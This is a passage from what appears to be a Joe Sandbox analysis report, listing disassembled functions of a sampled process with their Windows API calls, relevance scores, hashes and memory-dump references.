                                        • Opcode Fuzzy Hash: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                        • Instruction Fuzzy Hash: AA0136F694020CBFE721A7D4DD8DEE7776CEB08311F1145A1BB45E2081EAB89E848B75
                                        Function 00720547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 0072044A
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00720466
                                        • __allrem.LIBCMT ref: 0072047D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0072049B
                                        • __allrem.LIBCMT ref: 007204B2
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007204D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                        • Instruction ID: 67cc553aeffdf21fbede6e579e0ce74989248511e5c35723aeb7f7b2a8c935d3
                                        • Opcode Fuzzy Hash: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                        • Instruction Fuzzy Hash: 0E81F872600725DBE724EF69EC85B6A73E9EF45320F24812EF611D6283E778D94187E0
                                        Function 0077266D Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00773AA6: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00771979,00000000,?,?,00000000), ref: 00773AF2
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0077271D
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0077273E
                                        • WSAGetLastError.WSOCK32 ref: 0077274F
                                        • inet_ntoa.WSOCK32(?), ref: 007727E9
                                        • htons.WSOCK32(?,?,?,?,?), ref: 00772838
                                        • _strlen.LIBCMT ref: 00772892
                                          • Part of subcall function 00754277: _strlen.LIBCMT ref: 00754281
                                          • Part of subcall function 006F86FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0070C15A,?,?,?), ref: 006F871A
                                          • Part of subcall function 006F86FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0070C15A,?,?,?,?,006FAEB9,?,?), ref: 006F874D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 1923757996-0
                                        • Opcode ID: 588e59bc508cc43834258a841f07037f6569398cced7c045d7cf01e0e09538e2
                                        • Instruction ID: cbf3b8a3c50447949d77058f7260c869d7a22de322f2222b4b1d188b2e9e4682
                                        • Opcode Fuzzy Hash: 588e59bc508cc43834258a841f07037f6569398cced7c045d7cf01e0e09538e2
                                        • Instruction Fuzzy Hash: 0DA1F331204300AFD714DF24C895F2A77E5AF84354F54854CF5AA9B2A3DB39ED86CB91
                                        Function 0072658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00718669,00718669,?,?,?,007267DF,00000001,00000001,8BE85006), ref: 007265E8
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007267DF,00000001,00000001,8BE85006,?,?,?), ref: 0072666E
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00726768
                                        • __freea.LIBCMT ref: 00726775
                                          • Part of subcall function 00723BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A99,?,0000015D,?,?,?,?,007185D0,000000FF,00000000,?,?), ref: 00723BE2
                                        • __freea.LIBCMT ref: 0072677E
                                        • __freea.LIBCMT ref: 007267A3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 73c40ebbf0b90aae9fcb92677b997668c00f188751cc249335df52387b62f3c1
                                        • Instruction ID: ec3206d7e501c76e2a8663777296d7dc13adde602dd1c22c6a3f5578a037edd8
                                        • Opcode Fuzzy Hash: 73c40ebbf0b90aae9fcb92677b997668c00f188751cc249335df52387b62f3c1
                                        • Instruction Fuzzy Hash: 2C51D372600226ABEB259F64EC85EBB77A9EF44754F25462AFC04D6290EB3CDC50C690
                                        Function 0077C53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C629
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C684
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C6C9
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0077C6F8
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077C752
                                        • RegCloseKey.ADVAPI32(?), ref: 0077C75E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 6e4b6f5cb3a00285ba3323fcbe5726cf4239fa5cbcd908e504231b01f499abff
                                        • Instruction ID: 1cd054485c936478dbf4dde97822ec3c08fff4b35fbe20c8b14ea0fbd72f4c2c
                                        • Opcode Fuzzy Hash: 6e4b6f5cb3a00285ba3323fcbe5726cf4239fa5cbcd908e504231b01f499abff
                                        • Instruction Fuzzy Hash: F081BC70208245AFDB15DF24C884E2ABBF5FF88348F14849CF5498B2A2DB35ED45CB92
                                        Function 0075003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 00750049
                                        • SysAllocString.OLEAUT32(00000000), ref: 007500F0
                                        • VariantCopy.OLEAUT32(007502F4,00000000), ref: 00750119
                                        • VariantClear.OLEAUT32(007502F4), ref: 0075013D
                                        • VariantCopy.OLEAUT32(007502F4,00000000), ref: 00750141
                                        • VariantClear.OLEAUT32(?), ref: 0075014B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: f97450738e5f27eb9fa862576458a30b31dfe9ef2956315c8c50acd4a51a2533
                                        • Instruction ID: 4d0f24e10de42dbb3744a6a39103287051450ac1dd3bc9e59dda3dbdb75ac0a6
                                        • Opcode Fuzzy Hash: f97450738e5f27eb9fa862576458a30b31dfe9ef2956315c8c50acd4a51a2533
                                        • Instruction Fuzzy Hash: 29510835540318EACF20AB649889BAD73A5BF05311F24944AED05DF2D6EBF89C48CBD6
                                        Function 00766DE8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00766E36
                                        • CoInitialize.OLE32(00000000), ref: 00766F93
                                        • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00766FAA
                                        • CoUninitialize.OLE32 ref: 0076722E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 813381e61152b70fb5aa916161d465a20d8e4856311842a88736eff3ce3fda0b
                                        • Instruction ID: e77c511372919206e5521b0d1ae884bf1782cb03b8104cb6ce3f21139929305e
                                        • Opcode Fuzzy Hash: 813381e61152b70fb5aa916161d465a20d8e4856311842a88736eff3ce3fda0b
                                        • Instruction Fuzzy Hash: 8FD14771608205AFC344DF24C881DAAB7E9FF94704F40495DF6968B2A2DB71ED05CB92
                                        Function 00788B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0074FB8F,00000000,?,?,00000000,?,007339BC,00000004,00000000,00000000), ref: 00788BAB
                                        • EnableWindow.USER32(?,00000000), ref: 00788BD1
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00788C30
                                        • ShowWindow.USER32(?,00000004), ref: 00788C44
                                        • EnableWindow.USER32(?,00000001), ref: 00788C6A
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00788C8E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: 1e629b163b1b9d0a41281a26a935178825e85e102f0c21daa71a0b3a478fe58e
                                        • Instruction ID: a5835f7a32dc45ec56caa6a1fa40a587de5b2d52fbb6364835be204aafc231c3
                                        • Opcode Fuzzy Hash: 1e629b163b1b9d0a41281a26a935178825e85e102f0c21daa71a0b3a478fe58e
                                        • Instruction Fuzzy Hash: 5141B8B4641144AFDB65EF14C889FA17FE0FF45304F5881A9E5085F2A2CB79AC41CB55
                                        Function 00772C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00772C45
                                          • Part of subcall function 0076EE49: GetWindowRect.USER32(?,?), ref: 0076EE61
                                        • GetDesktopWindow.USER32 ref: 00772C6F
                                        • GetWindowRect.USER32(00000000), ref: 00772C76
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00772CB2
                                        • GetCursorPos.USER32(?), ref: 00772CDE
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00772D3C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: 63b269ac595ce47bc1bf60fd27972ab08d4071ef428f37d86171a49cd54a3e33
                                        • Instruction ID: 608c41910d6797eedd7248267ff2f54673ef7dad78a2d2db6a14faaec4646fe2
                                        • Opcode Fuzzy Hash: 63b269ac595ce47bc1bf60fd27972ab08d4071ef428f37d86171a49cd54a3e33
                                        • Instruction Fuzzy Hash: 54312472505315ABDB20DF14C848F9F77A9FFC4394F10491AF89997191DB38EA09CBA1
                                        Function 00766178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • _wcslen.LIBCMT ref: 007661D5
                                        • CoInitialize.OLE32(00000000), ref: 007662EF
                                        • CoCreateInstance.OLE32(00790CC4,00000000,00000001,00790B34,?), ref: 00766308
                                        • CoUninitialize.OLE32 ref: 00766326
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: 237c73a93dfd0aa4b46d14e9909160b8d84c4495f2678f7eb0026f77737f2f05
                                        • Instruction ID: bb3b4779b51152725ad93173ef3472fc2af9847ad77216f9285678456138c51f
                                        • Opcode Fuzzy Hash: 237c73a93dfd0aa4b46d14e9909160b8d84c4495f2678f7eb0026f77737f2f05
                                        • Instruction Fuzzy Hash: E6D152716042049FCB14DF24C494A2ABBF6FF89714F54889CF98A9B362CB35ED45CB92
                                        Function 00752104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0075210F
                                        • UnloadUserProfile.USERENV(?,?), ref: 0075211B
                                        • CloseHandle.KERNEL32(?), ref: 00752124
                                        • CloseHandle.KERNEL32(?), ref: 0075212C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00752135
                                        • HeapFree.KERNEL32(00000000), ref: 0075213C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: 6ff97e01feba84e5fa04473b5b8439218fd31ce3a3f17b6b5dc38d3f5811737d
                                        • Instruction ID: 25fe85119cf1f188fa02f630d9aa9048ae6de28870f3981234aceae8c93744a7
                                        • Opcode Fuzzy Hash: 6ff97e01feba84e5fa04473b5b8439218fd31ce3a3f17b6b5dc38d3f5811737d
                                        • Instruction Fuzzy Hash: FFE0E576484105FBDB112FE1ED0C90ABF39FF49322B218220F225824B4CB369C20EB58
                                        Function 0075CD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F4154: _wcslen.LIBCMT ref: 006F4159
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CEAE
                                        • _wcslen.LIBCMT ref: 0075CEF5
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CF5C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0075CF8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: ef699288bff4fa587621e36346547b5c1e1609b9f1011577232d4fe8dd1e4068
                                        • Instruction ID: 77d2100e26be8bfee96d339e14ae607b079365f97f5c48a5652b22846a6fa626
                                        • Opcode Fuzzy Hash: ef699288bff4fa587621e36346547b5c1e1609b9f1011577232d4fe8dd1e4068
                                        • Instruction Fuzzy Hash: 1651E0726043009FD7169F28C885BABB7E9AF89315F040A2DFD95D61E0DBBCDD488792
                                        Function 007846DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00784794
                                        • IsMenu.USER32(?), ref: 007847A9
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007847F1
                                        • DrawMenuBar.USER32 ref: 00784804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: 06285786860c2ec8b940fdc71a55f01eecc01f1aaf10dfd9722c8d03f9537be4
                                        • Instruction ID: 732452ae8bf3ba641779939448ba6f6763330f60cce07f95fe4b4762d7a65203
                                        • Opcode Fuzzy Hash: 06285786860c2ec8b940fdc71a55f01eecc01f1aaf10dfd9722c8d03f9537be4
                                        • Instruction Fuzzy Hash: 7C415B75A4024AEFDB20DF54D888EAABBF5FF05354F148129E905A7250C778ED50CF50
                                        Function 00752672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                          • Part of subcall function 00754536: GetClassNameW.USER32(?,?,000000FF), ref: 00754559
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007526F6
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00752709
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00752739
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen$ClassName
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2081771294-1403004172
                                        • Opcode ID: d382b08564f583eff00d66c7544770cec7acc7b8128eac0bc2acf2f4d2656c6b
                                        • Instruction ID: 3f466f42de391fed50d87ffb8423884269e028b494dda5c5266115fd88799bbd
                                        • Opcode Fuzzy Hash: d382b08564f583eff00d66c7544770cec7acc7b8128eac0bc2acf2f4d2656c6b
                                        • Instruction Fuzzy Hash: AD21F671940108BFDB14AB64C849CFEB7B9DF46760F104519FA11931E2DBBC4D4A9614
                                        Function 006F6332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
                                        • FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                        • Instruction ID: 5f7b805a6407c105e0697793f23a0ab0321eab8e61bcbc2904b128bf711fc42d
                                        • Opcode Fuzzy Hash: 3462f1332fb3eb8453724189a1e8dbf3a621e5567bcb40dcd64108948eb6d32d
                                        • Instruction Fuzzy Hash: EAE08633A81B262792312716AC0CFAA671A9F82F227164115FA00D2280DB68CC0182B4
                                        Function 006F62FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6304
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6316
